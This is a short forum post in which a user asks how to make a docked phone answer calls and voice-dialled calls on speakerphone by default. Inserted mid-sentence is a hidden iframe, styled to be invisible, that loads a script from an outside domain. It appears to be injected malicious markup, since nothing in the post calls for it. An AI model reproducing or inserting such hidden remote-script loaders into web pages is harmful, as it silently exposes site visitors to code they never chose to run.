Does any one know how to set the phone always to switch to speaker phone? I would like to be able to switch all my calls directly to speaker phone when i dial using voice signal<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

i havnt found a way yet but this would be optimal. like i always want to answer in speaker phone when the phone is docked because its on my desk while i am working so when i get a call on it i just put it on speaker phone but its hard casue i have to answer first by bending down and talkind into it saying hold on then hitting speaker phone.

also when its docked and i hit voice signal it would be nice if it were all speaker phone.
